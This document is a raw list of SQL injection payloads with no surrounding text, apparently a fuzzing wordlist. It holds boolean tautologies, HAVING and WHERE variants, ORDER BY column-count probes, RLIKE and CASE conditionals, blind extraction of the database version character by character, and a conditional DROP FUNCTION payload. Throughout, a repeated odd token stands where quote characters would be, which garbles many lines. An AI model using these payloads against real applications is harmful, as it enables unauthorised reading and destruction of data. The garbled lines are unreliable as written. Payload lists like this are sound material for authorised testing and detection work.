 OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1-- 
 OR 1=0-- 
 OR x=x-- 
 OR x=y-- 
 OR 3409=3409 AND (HELLONIGERIOpytWHELLONIGERIO LIKE HELLONIGERIOpytW
 OR 3409=3409 AND (HELLONIGERIOpytWHELLONIGERIO LIKE HELLONIGERIOpytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND HELLONIGERIO%HELLONIGERIO=HELLONIGERIO
 AND 1=0 AND HELLONIGERIO%HELLONIGERIO=HELLONIGERIO
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND (HELLONIGERIO1427=1427
 AND 7506=9091 AND (HELLONIGERIO5913=5913
 AND 7300=7300 AND HELLONIGERIOpKlZHELLONIGERIO=HELLONIGERIOpKlZ
 AND 7300=7300 AND HELLONIGERIOpKlZHELLONIGERIO=HELLONIGERIOpKlY
 AND 7300=7300 AND (HELLONIGERIOpKlZHELLONIGERIO=HELLONIGERIOpKlZ
 AND 7300=7300 AND (HELLONIGERIOpKlZHELLONIGERIO=HELLONIGERIOpKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14# 
 ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23# 
 ORDER BY 24# 
 ORDER BY 25# 
 ORDER BY 26# 
 ORDER BY 27# 
 ORDER BY 28# 
 ORDER BY 29# 
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1 
 ORDER BY 2 
 ORDER BY 3 
 ORDER BY 4 
 ORDER BY 5 
 ORDER BY 6 
 ORDER BY 7 
 ORDER BY 8 
 ORDER BY 9 
 ORDER BY 10 
 ORDER BY 11 
 ORDER BY 12 
 ORDER BY 13 
 ORDER BY 14 
 ORDER BY 15 
 ORDER BY 16 
 ORDER BY 17 
 ORDER BY 18 
 ORDER BY 19 
 ORDER BY 20 
 ORDER BY 21 
 ORDER BY 22 
 ORDER BY 23 
 ORDER BY 24 
 ORDER BY 25 
 ORDER BY 26 
 ORDER BY 27 
 ORDER BY 28 
 ORDER BY 29 
 ORDER BY 30 
 ORDER BY 31337 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND HELLONIGERIOTxwsHELLONIGERIO=HELLONIGERIO
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND HELLONIGERIOTxwsHELLONIGERIO=HELLONIGERIO
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%HELLONIGERIO AND 8310=8310 AND HELLONIGERIO%HELLONIGERIO=HELLONIGERIO
%HELLONIGERIO AND 8310=8311 AND HELLONIGERIO%HELLONIGERIO=HELLONIGERIO
 and (select substring(@@version,1,1))=HELLONIGERIOXHELLONIGERIO
 and (select substring(@@version,1,1))=HELLONIGERIOMHELLONIGERIO
 and (select substring(@@version,2,1))=HELLONIGERIOiHELLONIGERIO
 and (select substring(@@version,2,1))=HELLONIGERIOyHELLONIGERIO
 and (select substring(@@version,3,1))=HELLONIGERIOcHELLONIGERIO
 and (select substring(@@version,3,1))=HELLONIGERIOSHELLONIGERIO
 and (select substring(@@version,3,1))=HELLONIGERIOXHELLONIGERIO
